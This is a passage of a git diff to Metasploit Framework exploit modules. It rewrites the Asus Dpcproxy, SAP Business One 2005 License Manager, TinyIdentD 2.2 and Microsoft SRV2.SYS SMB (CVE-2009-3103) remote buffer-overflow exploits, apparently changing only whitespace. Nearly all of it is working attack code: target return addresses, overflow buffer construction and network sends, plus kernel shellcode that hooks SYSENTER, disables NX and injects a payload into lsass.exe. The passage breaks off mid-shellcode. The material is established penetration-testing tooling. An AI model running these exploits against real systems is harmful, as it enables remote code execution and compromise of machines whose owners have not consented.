-					[ 'BID', '28394' ],
-				],
-			'DefaultOptions' =>
-				{
-					'EXITFUNC' => 'process',
-				},
-			'Payload'        =>
-				{
-					'Space'    => 400,
-					'BadChars' => "\x07\x08\x0d\x0e\x0f\x7e\x7f\xff",
-				},
-			'Platform'       => 'win',
-			'Targets'        =>
-				[
-					[ 'Asus Dpcroxy version 2.00.19 Universal',     { 'Ret' => 0x0040273b } ], # p/p/r
-				],
-			'Privileged'     => true,
-			'DefaultTarget'  => 0,
-			'DisclosureDate' => 'March 21 2008'))
-
-			register_options([Opt::RPORT(623)], self.class)
-
-	end
-
-	def exploit
-		connect
-
-		sploit =   make_nops(0x38a - payload.encoded.length)+ payload.encoded + rand_text_english(6032)
-		sploit << Rex::Arch::X86.jmp_short(6) + make_nops(2)
-		sploit << [target.ret].pack('V') +  make_nops(8) + Metasm::Shellcode.assemble(Metasm::Ia32.new, "add bh,6 add bh,6 add bh,2 push ebx ret").encode_string #jmp back
-		sploit << make_nops(50)
-
-		print_status("Trying target #{target.name}...")
-		sock.put(sploit)
-		sleep(3) # =(
-
-		handler
-		disconnect
-	end
-
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Asus Dpcproxy Buffer Overflow',
+			'Description'    => %q{
+					This module exploits a stack overflow in Asus Dpcroxy version 2.0.0.19.
+					It should be vulnerable until version 2.0.0.24.
+					Credit to Luigi Auriemma
+			},
+			'Author'         => 'Jacopo Cervini',
+			'Version'        => '$Revision$',
+			'References'     => 
+				[ 
+					[ 'CVE', '2008-1491' ],
+					[ 'OSVDB', '43638' ],
+					[ 'BID', '28394' ],
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'process',
+				},
+			'Payload'        =>
+				{
+					'Space'    => 400,
+					'BadChars' => "\x07\x08\x0d\x0e\x0f\x7e\x7f\xff",
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 'Asus Dpcroxy version 2.00.19 Universal',     { 'Ret' => 0x0040273b } ], # p/p/r
+				],
+			'Privileged'     => true,
+			'DefaultTarget'  => 0,
+			'DisclosureDate' => 'March 21 2008'))
+
+			register_options([Opt::RPORT(623)], self.class)
+
+	end
+
+	def exploit
+		connect
+
+		sploit =   make_nops(0x38a - payload.encoded.length)+ payload.encoded + rand_text_english(6032)
+		sploit << Rex::Arch::X86.jmp_short(6) + make_nops(2)
+		sploit << [target.ret].pack('V') +  make_nops(8) + Metasm::Shellcode.assemble(Metasm::Ia32.new, "add bh,6 add bh,6 add bh,2 push ebx ret").encode_string #jmp back
+		sploit << make_nops(50)
+
+		print_status("Trying target #{target.name}...")
+		sock.put(sploit)
+		sleep(3) # =(
+
+		handler
+		disconnect
+	end
+
 end
diff --git a/modules/exploits/windows/misc/sap_2005_license.rb b/modules/exploits/windows/misc/sap_2005_license.rb
index d7772d4c21..4f108a83a9 100644
--- a/modules/exploits/windows/misc/sap_2005_license.rb
+++ b/modules/exploits/windows/misc/sap_2005_license.rb
@@ -1,78 +1,78 @@
-##
-# $Id$
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to 
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/projects/Framework/
-##
-
-
-require 'msf/core'
-
-
-class Metasploit3 < Msf::Exploit::Remote
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Exploit::Remote
 	Rank = GreatRanking
-
-	include Msf::Exploit::Remote::Tcp
-
-	def initialize(info = {})
-		super(update_info(info,
-			'Name'           => 'SAP Business One License Manager 2005 Buffer Overflow',
-			'Description'    => %q{
-					This module exploits a stack overflow in the SAP Business One 2005
-					License Manager 'NT Naming Service' A and B releases. By sending an
-					excessively long string the stack is overwritten enabling arbitrary
-					code execution.
-			},
-			'Author'         => 'Jacopo Cervini',
-			'Version'        => '$Revision$',
-			'References'     => 
-				[
-					[ 'OSVDB', '56837' ],
-					[ 'BID', '35933' ],
-					[ 'URL', 'http://www.milw0rm.com/exploits/9319' ],
-				],
-			'DefaultOptions' =>
-				{
-					'EXITFUNC' => 'process',
-				},
-			'Payload'        =>
-				{
-					'Space'    => 400,
-					'BadChars' => "\x00",
-					'StackAdjustment' => -3500,
-				},
-			'Platform'       => 'win',
-			'Targets'        =>
-				[
-					# patrickw tested OK w2k3sp2 20090910
-					[ 'Sap Business One 2005 B1 Universal', { 'Ret' => 0x00547b82 } ], # tao2005.dll push esp /ret
-				],
-			'Privileged'     => true,
-			'DefaultTarget'  => 0,
-			'DisclosureDate' => 'Aug 1 2009'))
-
-			register_options([Opt::RPORT(30000)], self.class)
-
-	end
-
-	def exploit
-		connect
-
-		sploit =  "\x47\x49\x4f\x50\x01\x00\x01\x00" + rand_text_english(1024)
-		sploit << [target.ret].pack('V') # EIP for w2k3sp2 - jacopo (1024)
-		sploit << [target.ret].pack('V') # EIP for w2k3sp0 - patrickw (1028)
-		sploit << make_nops(44) + payload.encoded + make_nops(384)
-
-		print_status("Trying target #{target.name}...")
-		sock.put(sploit)
-		sleep(1)
-
-		handler
-		disconnect
-	end
-
-end
+
+	include Msf::Exploit::Remote::Tcp
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'SAP Business One License Manager 2005 Buffer Overflow',
+			'Description'    => %q{
+					This module exploits a stack overflow in the SAP Business One 2005
+					License Manager 'NT Naming Service' A and B releases. By sending an
+					excessively long string the stack is overwritten enabling arbitrary
+					code execution.
+			},
+			'Author'         => 'Jacopo Cervini',
+			'Version'        => '$Revision$',
+			'References'     => 
+				[
+					[ 'OSVDB', '56837' ],
+					[ 'BID', '35933' ],
+					[ 'URL', 'http://www.milw0rm.com/exploits/9319' ],
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'process',
+				},
+			'Payload'        =>
+				{
+					'Space'    => 400,
+					'BadChars' => "\x00",
+					'StackAdjustment' => -3500,
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					# patrickw tested OK w2k3sp2 20090910
+					[ 'Sap Business One 2005 B1 Universal', { 'Ret' => 0x00547b82 } ], # tao2005.dll push esp /ret
+				],
+			'Privileged'     => true,
+			'DefaultTarget'  => 0,
+			'DisclosureDate' => 'Aug 1 2009'))
+
+			register_options([Opt::RPORT(30000)], self.class)
+
+	end
+
+	def exploit
+		connect
+
+		sploit =  "\x47\x49\x4f\x50\x01\x00\x01\x00" + rand_text_english(1024)
+		sploit << [target.ret].pack('V') # EIP for w2k3sp2 - jacopo (1024)
+		sploit << [target.ret].pack('V') # EIP for w2k3sp0 - patrickw (1028)
+		sploit << make_nops(44) + payload.encoded + make_nops(384)
+
+		print_status("Trying target #{target.name}...")
+		sock.put(sploit)
+		sleep(1)
+
+		handler
+		disconnect
+	end
+
+end
diff --git a/modules/exploits/windows/misc/tiny_identd_overflow.rb b/modules/exploits/windows/misc/tiny_identd_overflow.rb
index 854a0ab54a..f5db1f3713 100644
--- a/modules/exploits/windows/misc/tiny_identd_overflow.rb
+++ b/modules/exploits/windows/misc/tiny_identd_overflow.rb
@@ -1,77 +1,77 @@
-##
-# $Id$
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to 
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
-##
-
-
-require 'msf/core'
-
-
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
+require 'msf/core'
+
+
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = AverageRanking
-
+
 	include Msf::Exploit::Remote::Tcp
-
-	def initialize(info = {})
-		super(update_info(info,
-			'Name'           => 'TinyIdentD 2.2 Stack Overflow',
-			'Description'    => %q{
-				This module exploits a stack based buffer overflow in TinyIdentD version 2.2.
-				If we send a long string to the ident service we can overwrite the return
-				address and execute arbitrary code. Credit to Maarten Boone. 
-			},
-			'Author'         => 'Jacopo Cervini <acaro[at]jervus.it>',
-			'Version'        => '$Revision$',
-			'References'     => 
-				[
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'TinyIdentD 2.2 Stack Overflow',
+			'Description'    => %q{
+				This module exploits a stack based buffer overflow in TinyIdentD version 2.2.
+				If we send a long string to the ident service we can overwrite the return
+				address and execute arbitrary code. Credit to Maarten Boone. 
+			},
+			'Author'         => 'Jacopo Cervini <acaro[at]jervus.it>',
+			'Version'        => '$Revision$',
+			'References'     => 
+				[
 				    	['CVE', '2007-2711'],
 					['OSVDB', '36053'],
-					['BID', '23981'],
-				],
-			'Payload'        =>
-				{
-					'Space'    => 400,
-					'BadChars' => "\x00\x0d\x20\x0a"
-				},
-			'Platform'       => 'win',
-			'Targets'        =>
-				[
-					['Windows 2000 Server SP4 English',   { 'Ret' => 0x7c2d15e7, } ], # call esi 
-					['Windows XP SP2 Italian',            { 'Ret' => 0x77f46eda, } ], # call esi 
-					
-				],
-
-			'Privileged'     => false,
-			'DisclosureDate' => 'May 14 2007'
-			))
-
-			register_options([ Opt::RPORT(113) ], self.class)
-	end
-
-	def exploit
-		connect
-
-		pattern  = "\xeb\x20"+", 28 : USERID : UNIX :";
-		pattern << make_nops(0x1eb - payload.encoded.length)
-		pattern << payload.encoded
-		pattern << [ target.ret ].pack('V')
-		
-
-		request  = pattern + "\n"
-
-		print_status("Trying #{target.name} using address at #{"0x%.8x" % target.ret }...")
-
-		sock.put(request)
-		
-
-		handler
-		disconnect
-	end
-
+					['BID', '23981'],
+				],
+			'Payload'        =>
+				{
+					'Space'    => 400,
+					'BadChars' => "\x00\x0d\x20\x0a"
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					['Windows 2000 Server SP4 English',   { 'Ret' => 0x7c2d15e7, } ], # call esi 
+					['Windows XP SP2 Italian',            { 'Ret' => 0x77f46eda, } ], # call esi 
+					
+				],
+
+			'Privileged'     => false,
+			'DisclosureDate' => 'May 14 2007'
+			))
+
+			register_options([ Opt::RPORT(113) ], self.class)
+	end
+
+	def exploit
+		connect
+
+		pattern  = "\xeb\x20"+", 28 : USERID : UNIX :";
+		pattern << make_nops(0x1eb - payload.encoded.length)
+		pattern << payload.encoded
+		pattern << [ target.ret ].pack('V')
+		
+
+		request  = pattern + "\n"
+
+		print_status("Trying #{target.name} using address at #{"0x%.8x" % target.ret }...")
+
+		sock.put(request)
+		
+
+		handler
+		disconnect
+	end
+
 end
diff --git a/modules/exploits/windows/smb/smb2_negotiate_func_index.rb b/modules/exploits/windows/smb/smb2_negotiate_func_index.rb
index f6581d9e15..fca9d5caea 100644
--- a/modules/exploits/windows/smb/smb2_negotiate_func_index.rb
+++ b/modules/exploits/windows/smb/smb2_negotiate_func_index.rb
@@ -1,315 +1,315 @@
-##
-# $Id$
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to 
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
-##
-
-
-require 'msf/core'
-
-
-class Metasploit3 < Msf::Exploit::Remote
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Exploit::Remote
 	Rank = GoodRanking
-
-	include Msf::Exploit::Remote::SMB
-
-	def initialize(info = {})
-		super(update_info(info,	
-			'Name'           => 'Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference',
-			'Description'    => %q{
-				This module exploits an out of bounds function table dereference in the SMB
-			request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7
-			release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista
-			without SP1 does not seem affected by this flaw.
-			},
-
-			'Author'         => [ 'laurent.gaffie[at]gmail.com', 'hdm', 'sf' ],
-			'License'        => MSF_LICENSE,
-			'Version'        => '$Revision$',
-			'References'     => 
-				[
-					['CVE', '2009-3103'],
-					['BID', '36299'],
-					['OSVDB', '57799'],
-					['URL', 'http://seclists.org/fulldisclosure/2009/Sep/0039.html'],
-					['URL', 'http://www.microsoft.com/technet/security/advisory/975497.mspx']
-				],
-			'DefaultOptions' =>
-				{
-					'EXITFUNC' => 'thread',
-				},
-			'Privileged'     => true,
-			'Payload'        =>
-				{
-					'Space'           => 1024,
-					'StackAdjustment' => -3500,
-					'DisableNops'     => true,
-					'EncoderType'     => Msf::Encoder::Type::Raw,
-				},
-			'Platform'       => 'win',
-			'Targets'        =>
-				[		
-					[ 'Windows Vista SP1/SP2 and Server 2008 (x86)',
-						{
-							'Platform'       => 'win',
-							'Arch'           => [ ARCH_X86 ],
-							'Ret'            => 0xFFD00D09, # "POP ESI; RET" from the kernels HAL memory region ...no ASLR :)
-							'ReadAddress'    => 0xFFDF0D04, # A readable address from kernel space (no nulls in address).
-							'ProcessIDHigh'  => 0x0217,     # srv2!SrvSnapShotScavengerTimer
-							'MagicIndex'     => 0x3FFFFFB4, # (DWORD)( MagicIndex*4 + 0x130 ) == 0
-						}
-					],
-				],
-			'DefaultTarget' => 0
-			))
-
-		register_options( [ Opt::RPORT(445), OptInt.new( 'WAIT', [ true,  "The number of seconds to wait for the attack to complete.", 180 ] ) ], self.class )
-	end
-
-	# Not reliable enough for automation yet
-	def autofilter
-		false
-	end
-	
-	# The payload works as follows:
-	# * Our sysenter handler and ring3 stagers are copied over to safe location.
-	# * The SYSENTER_EIP_MSR is patched to point to our sysenter handler.
-	# * The srv2.sys thread we are in is placed in a halted state.
-	# * Upon any ring3 proces issuing a sysenter command our ring0 sysenter handler gets control.
-	# * The ring3 return address is modified to force our ring3 stub to be called if certain conditions met.
-	# * If NX is enabled we patch the respective page table entry to disable it for the ring3 code.
-	# * Control is passed to real sysenter handler, upon the real sysenter handler finishing, sysexit will return to our ring3 stager.
-	# * If the ring3 stager is executing in the desired process our sysenter handler is removed and the real ring3 payload called.
-	def ring0_x86_payload( opts = {} )
-		
-		# The page table entry for StagerAddressUser, used to bypass NX in ring3 on PAE enabled systems (should be static).
-		pagetable = opts['StagerAddressPageTable'] || 0xC03FFF00
-		
-		# The address in kernel memory where we place our ring0 and ring3 stager (no ASLR).
-		kstager   = opts['StagerAddressKernel'] || 0xFFDF0400
-		
-		# The address in shared memory (addressable from ring3) where we can find our ring3 stager (no ASLR).
-		ustager   = opts['StagerAddressUser'] || 0x7FFE0400
-		
-		# Target SYSTEM process to inject ring3 payload into.
-		process   = (opts['RunInWin32Process'] || 'lsass.exe').unpack('C*')
-		
-		# A simple hash of the process name based on the first 4 wide chars.
-		# Assumes process is located at '*:\windows\system32\'. (From Rex::Payloads::Win32::Kernel::Stager)
-		checksum  = process[0] + ( process[2] << 8 )  + ( process[1] << 16 ) + ( process[3] << 24 )
-		
-		# The ring0 -> ring3 payload blob. Full assembly listing given below.
-		r0 =    "\xFC\xFA\xEB\x1E\x5E\x68\x76\x01\x00\x00\x59\x0F\x32\x89\x46\x60" +
-				"\x8B\x7E\x64\x89\xF8\x0F\x30\xB9\x41\x41\x41\x41\xF3\xA4\xFB\xF4" +
-				"\xEB\xFD\xE8\xDD\xFF\xFF\xFF\x6A\x00\x9C\x60\xE8\x00\x00\x00\x00" +
-				"\x58\x8B\x58\x57\x89\x5C\x24\x24\x81\xF9\xDE\xC0\xAD\xDE\x75\x10" +
-				"\x68\x76\x01\x00\x00\x59\x89\xD8\x31\xD2\x0F\x30\x31\xC0\xEB\x34" +
-				"\x8B\x32\x0F\xB6\x1E\x66\x81\xFB\xC3\x00\x75\x28\x8B\x58\x5F\x8D" +
-				"\x5B\x6C\x89\x1A\xB8\x01\x00\x00\x80\x0F\xA2\x81\xE2\x00\x00\x10" +
-				"\x00\x74\x11\xBA\x45\x45\x45\x45\x81\xC2\x04\x00\x00\x00\x81\x22" +
-				"\xFF\xFF\xFF\x7F\x61\x9D\xC3\xFF\xFF\xFF\xFF\x42\x42\x42\x42\x43" +
-				"\x43\x43\x43\x60\x6A\x30\x58\x99\x64\x8B\x18\x39\x53\x0C\x74\x2E" +
-				"\x8B\x43\x10\x8B\x40\x3C\x83\xC0\x28\x8B\x08\x03\x48\x03\x81\xF9" +
-				"\x44\x44\x44\x44\x75\x18\xE8\x0A\x00\x00\x00\xE8\x10\x00\x00\x00" +
-				"\xE9\x09\x00\x00\x00\xB9\xDE\xC0\xAD\xDE\x89\xE2\x0F\x34\x61\xC3"
-		# Patch in the required values.
-		r0 = r0.gsub( [ 0x41414141 ].pack("V"), [ ( r0.length + payload.encoded.length - 0x1C ) ].pack("V") )
-		r0 = r0.gsub( [ 0x42424242 ].pack("V"), [ kstager ].pack("V") )
-		r0 = r0.gsub( [ 0x43434343 ].pack("V"), [ ustager ].pack("V") )
-		r0 = r0.gsub( [ 0x44444444 ].pack("V"), [ checksum ].pack("V") )
-		r0 = r0.gsub( [ 0x45454545 ].pack("V"), [ pagetable ].pack("V") )
-		# Return the ring0 -> ring3 payload blob with the real ring3 payload appended.
-		return r0 + payload.encoded
-	end
-	
-	def exploit
-		print_status( "Connecting to the target (#{datastore['RHOST']}:#{datastore['RPORT']})..." )
-		connect
-
-		# we use ReadAddress to avoid problems in srv2!SrvProcCompleteRequest 
-		# and srv2!SrvProcPartialCompleteCompoundedRequest
-		dialects = [ [ target['ReadAddress'] ].pack("V") * 25, "SMB 2.002" ]
-		
-		data  = dialects.collect { |dialect| "\x02" + dialect + "\x00" }.join('')
-		data += [ 0x00000000 ].pack("V") * 37 # Must be NULL's
-		data += [ 0xFFFFFFFF ].pack("V")      # Used in srv2!SrvConsumeDataAndComplete2+0x34 (known stability issue with srv2!SrvConsumeDataAndComplete2+6b)
-		data += [ 0xFFFFFFFF ].pack("V")      # Used in srv2!SrvConsumeDataAndComplete2+0x34	
-		data += [ 0x42424242 ].pack("V") * 7  # Unused
-		data += [ target['MagicIndex'] ].pack("V") # An index to force an increment the SMB header value :) (srv2!SrvConsumeDataAndComplete2+0x7E)
-		data += [ 0x41414141 ].pack("V") * 6  # Unused
-		data += [ target.ret ].pack("V")      # EIP Control thanks to srv2!SrvProcCompleteRequest+0xD2
-		data += ring0_x86_payload( target['PayloadOptions'] || {} ) # Our ring0 -> ring3 shellcode
-		
-		# We gain code execution by returning into the SMB packet, begining with its header.
-		# The SMB packets Magic Header value is 0xFF534D42 which assembles to "CALL DWORD PTR [EBX+0x4D]; INC EDX"
-		# This will cause an access violation if executed as we can never set EBX to a valid pointer.
-		# To overcome this we force an increment of the header value (via MagicIndex), transforming it to 0x00544D42.
-		# This assembles to "ADD BYTE PTR [EBP+ECX*2+0x42], DL" which is fine as ECX will be zero and EBP is a vaild pointer.
-		# We patch the Signature1 value to be a jump forward into our shellcode.
-		packet = Rex::Proto::SMB::Constants::SMB_NEG_PKT.make_struct
-		packet['Payload']['SMB'].v['Command']       = Rex::Proto::SMB::Constants::SMB_COM_NEGOTIATE
-		packet['Payload']['SMB'].v['Flags1']        = 0x18
-		packet['Payload']['SMB'].v['Flags2']        = 0xC853
-		packet['Payload']['SMB'].v['ProcessIDHigh'] = target['ProcessIDHigh']
-		packet['Payload']['SMB'].v['Signature1']    = 0x0158E900 # "JMP DWORD 0x15D" ; jump into our ring0 payload.
-		packet['Payload']['SMB'].v['Signature2']    = 0x00000000 # ...
-		packet['Payload']['SMB'].v['MultiplexID']   = rand( 0x10000 )
-		packet['Payload'].v['Payload']              = data
-		
-		packet = packet.to_s
-		
-		print_status( "Sending the exploit packet (#{packet.length} bytes)..." )
-		sock.put( packet )
-
-
-		wtime = datastore['WAIT'].to_i
-		print_status( "Waiting up to #{wtime} second#{wtime == 1 ? '' : 's'} for exploit to trigger..." )
-		stime = Time.now.to_i
-
-
-		poke_logins = %W{Guest Administrator}
-		poke_logins.each do |login|
-			begin
-				sec = connect(false)
-				sec.login(datastore['SMBName'], login, rand_text_alpha(rand(8)+1), rand_text_alpha(rand(8)+1))
-			rescue ::Exception => e
-				sec.socket.close
-			end			
-		end
-
-		while( stime + wtime > Time.now.to_i )
-			select(nil, nil, nil, 0.25)
-			break if session_created?
-		end
-		
-		handler
-		disconnect
-	end
-
-end
-
-=begin
-;===================================================================================
-; sf
-; Recommended Reading: Kernel-mode Payloads on Windows, 2005, bugcheck & skape.
-;                      http://www.uninformed.org/?v=3&a=4&t=sumry
-;===================================================================================
-[bits 32]
-[org 0]
-;===================================================================================
-ring0_migrate_start:
-	cld
-	cli
-	jmp short ring0_migrate_bounce ; jump to bounce to get ring0_stager_start address
-ring0_migrate_patch:
-	pop esi                        ; pop off ring0_stager_start address
-	; get current sysenter msr (nt!KiFastCallEntry)
-	push 0x176                     ; SYSENTER_EIP_MSR
-	pop ecx
-	rdmsr
-	; save origional sysenter msr (nt!KiFastCallEntry)
-	mov dword [ esi + ( ring0_stager_data - ring0_stager_start ) + 0 ], eax
-	; retrieve the address in kernel memory where we will write the ring0 stager + ring3 code
-	mov edi, dword [ esi + ( ring0_stager_data - ring0_stager_start ) + 4 ]
-	; patch sysenter msr to be our stager
-	mov eax, edi
-	wrmsr
-	; copy over stager to shared memory
-	mov ecx, 0x41414141 ; ( ring3_stager - ring0_stager_start + length(ring3_stager) )
-	rep	movsb
-	sti ; set interrupt flag
-	; Halt this thread to avoid problems.
-ring0_migrate_idle:
-	hlt
-	jmp short ring0_migrate_idle
-ring0_migrate_bounce:
-	call ring0_migrate_patch ; call the patch code, pushing the ring0_stager_start address to stack
-;===================================================================================
-; This stager will now get called every time a ring3 process issues a sysenter
-ring0_stager_start:
-	push byte 0 ; alloc a dword for the patched return address
-	pushfd ; save flags and registers
-	pushad
-	call ring0_stager_eip
-ring0_stager_eip:
-	pop eax
-	; patch in the real nt!KiFastCallEntry address as our return address
-	mov ebx, dword [ eax + ( ring0_stager_data - ring0_stager_eip ) + 0 ]
-	mov [ esp + 36 ], ebx
-	; see if we are being told to remove our sysenter hook...
-	cmp ecx, 0xDEADC0DE
-	jne ring0_stager_hook
-	push 0x176 ; SYSENTER_EIP_MSR
-	pop ecx
-	mov eax, ebx ; set the sysenter msr to be the real nt!KiFastCallEntry address
-	xor edx, edx
-	wrmsr
-	xor eax, eax ; clear eax (the syscall number) so we can continue
-	jmp short ring0_stager_finish
-ring0_stager_hook:
-	; get the origional r3 return address (edx is the ring3 stack pointer)
-	mov esi, [ edx ]
-	; determine if the return is to a "ret" instruction
-	movzx ebx, byte [ esi ]
-	cmp bx, 0xC3
-	; only insert our ring3 stager hook if we are to return to a single ret (for stability).
-	jne short ring0_stager_finish
-	; calculate our r3 address in shared memory
-	mov ebx, dword [ eax + ( ring0_stager_data - ring0_stager_eip ) + 8 ]
-	lea ebx, [ ebx + ring3_start - ring0_stager_start ]
-	; patch in our r3 stage as the r3 return address
-	mov [ edx ], ebx
-	; detect if NX is present (clobbers eax,ebx,ecx,edx)...
-	mov eax, 0x80000001
-	cpuid
-	and edx, 0x00100000 ; bit 20 is the NX bit
-	jz short ring0_stager_finish
-	; modify the correct page table entry to make our ring3 stager executable
-	mov edx, 0x45454545 ; we default to 0xC03FFF00 this for now (should calculate dynamically).
-	add edx, 4
-	and dword [ edx ], 0x7FFFFFFF ; clear the NX bit
-	; finish up by returning into the real KiFastCallEntry and then returning into our ring3 code (if hook was set).
-ring0_stager_finish:
-	popad ; restore registers
-	popfd ; restore flags
-	ret ; return to real nt!KiFastCallEntry
-ring0_stager_data:
-	dd 0xFFFFFFFF ; saved nt!KiFastCallEntry
-	dd 0x42424242 ; kernel memory address of stager (default to 0xFFDF0400)
-	dd 0x43434343 ; shared user memory address of stager (default to 0x7FFE0400)
-;===================================================================================
-ring3_start:
-	pushad
-	push byte 0x30
-	pop eax
-	cdq ; zero edx
-	mov ebx, [ fs : eax ] ; get the PEB
-	cmp [ ebx + 0xC ], edx
-	jz ring3_finish
-	mov eax, [ ebx + 0x10 ] ; get pointer to the ProcessParameters (_RTL_USER_PROCESS_PARAMETERS)
-	mov eax, [ eax + 0x3C ] ; get the current processes ImagePathName (unicode string)
-	add eax, byte 0x28 ; advance past '*:\windows\system32\' (we assume this as we want a system process).
-	mov ecx, [ eax ] ; compute a simple hash of the name. get first 2 wide chars of name 'l\x00s\x00'
-	add ecx, [ eax + 0x3 ] ; and add '\x00a\x00s'
-	cmp ecx, 0x44444444 ; check the hash (default to hash('lsass.exe') == 0x7373616C)
-	jne ring3_finish ; if we are not currently in the correct process, return to real caller
-	call ring3_cleanup ; otherwise we first remove our ring0 sysenter hook
-	call ring3_stager ; and then call the real ring3 payload
-	jmp ring3_finish ; should the payload return we can resume this thread correclty.
-ring3_cleanup:
-	mov ecx, 0xDEADC0DE ; set the magic value for ecx
-	mov edx, esp ; save our esp in edx for sysenter
-	sysenter ; now sysenter into ring0 to remove the sysenter hook (return to ring3_cleanup's caller).
-ring3_finish:
-	popad
-	ret ; return to the origional system calls caller
-;===================================================================================
-ring3_stager:
-	; ...ring3 stager here...
-;===================================================================================
-=end
+
+	include Msf::Exploit::Remote::SMB
+
+	def initialize(info = {})
+		super(update_info(info,	
+			'Name'           => 'Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference',
+			'Description'    => %q{
+				This module exploits an out of bounds function table dereference in the SMB
+			request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7
+			release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista
+			without SP1 does not seem affected by this flaw.
+			},
+
+			'Author'         => [ 'laurent.gaffie[at]gmail.com', 'hdm', 'sf' ],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision$',
+			'References'     => 
+				[
+					['CVE', '2009-3103'],
+					['BID', '36299'],
+					['OSVDB', '57799'],
+					['URL', 'http://seclists.org/fulldisclosure/2009/Sep/0039.html'],
+					['URL', 'http://www.microsoft.com/technet/security/advisory/975497.mspx']
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'thread',
+				},
+			'Privileged'     => true,
+			'Payload'        =>
+				{
+					'Space'           => 1024,
+					'StackAdjustment' => -3500,
+					'DisableNops'     => true,
+					'EncoderType'     => Msf::Encoder::Type::Raw,
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[		
+					[ 'Windows Vista SP1/SP2 and Server 2008 (x86)',
+						{
+							'Platform'       => 'win',
+							'Arch'           => [ ARCH_X86 ],
+							'Ret'            => 0xFFD00D09, # "POP ESI; RET" from the kernels HAL memory region ...no ASLR :)
+							'ReadAddress'    => 0xFFDF0D04, # A readable address from kernel space (no nulls in address).
+							'ProcessIDHigh'  => 0x0217,     # srv2!SrvSnapShotScavengerTimer
+							'MagicIndex'     => 0x3FFFFFB4, # (DWORD)( MagicIndex*4 + 0x130 ) == 0
+						}
+					],
+				],
+			'DefaultTarget' => 0
+			))
+
+		register_options( [ Opt::RPORT(445), OptInt.new( 'WAIT', [ true,  "The number of seconds to wait for the attack to complete.", 180 ] ) ], self.class )
+	end
+
+	# Not reliable enough for automation yet
+	def autofilter
+		false
+	end
+	
+	# The payload works as follows:
+	# * Our sysenter handler and ring3 stagers are copied over to safe location.
+	# * The SYSENTER_EIP_MSR is patched to point to our sysenter handler.
+	# * The srv2.sys thread we are in is placed in a halted state.
+	# * Upon any ring3 proces issuing a sysenter command our ring0 sysenter handler gets control.
+	# * The ring3 return address is modified to force our ring3 stub to be called if certain conditions met.
+	# * If NX is enabled we patch the respective page table entry to disable it for the ring3 code.
+	# * Control is passed to real sysenter handler, upon the real sysenter handler finishing, sysexit will return to our ring3 stager.
+	# * If the ring3 stager is executing in the desired process our sysenter handler is removed and the real ring3 payload called.
+	def ring0_x86_payload( opts = {} )
+		
+		# The page table entry for StagerAddressUser, used to bypass NX in ring3 on PAE enabled systems (should be static).
+		pagetable = opts['StagerAddressPageTable'] || 0xC03FFF00
+		
+		# The address in kernel memory where we place our ring0 and ring3 stager (no ASLR).
+		kstager   = opts['StagerAddressKernel'] || 0xFFDF0400
+		
+		# The address in shared memory (addressable from ring3) where we can find our ring3 stager (no ASLR).
+		ustager   = opts['StagerAddressUser'] || 0x7FFE0400
+		
+		# Target SYSTEM process to inject ring3 payload into.
+		process   = (opts['RunInWin32Process'] || 'lsass.exe').unpack('C*')
+		
+		# A simple hash of the process name based on the first 4 wide chars.
+		# Assumes process is located at '*:\windows\system32\'. (From Rex::Payloads::Win32::Kernel::Stager)
+		checksum  = process[0] + ( process[2] << 8 )  + ( process[1] << 16 ) + ( process[3] << 24 )
+		
+		# The ring0 -> ring3 payload blob. Full assembly listing given below.
+		r0 =    "\xFC\xFA\xEB\x1E\x5E\x68\x76\x01\x00\x00\x59\x0F\x32\x89\x46\x60" +
+				"\x8B\x7E\x64\x89\xF8\x0F\x30\xB9\x41\x41\x41\x41\xF3\xA4\xFB\xF4" +
+				"\xEB\xFD\xE8\xDD\xFF\xFF\xFF\x6A\x00\x9C\x60\xE8\x00\x00\x00\x00" +
+				"\x58\x8B\x58\x57\x89\x5C\x24\x24\x81\xF9\xDE\xC0\xAD\xDE\x75\x10" +
+				"\x68\x76\x01\x00\x00\x59\x89\xD8\x31\xD2\x0F\x30\x31\xC0\xEB\x34" +
+				"\x8B\x32\x0F\xB6\x1E\x66\x81\xFB\xC3\x00\x75\x28\x8B\x58\x5F\x8D" +
+				"\x5B\x6C\x89\x1A\xB8\x01\x00\x00\x80\x0F\xA2\x81\xE2\x00\x00\x10" +
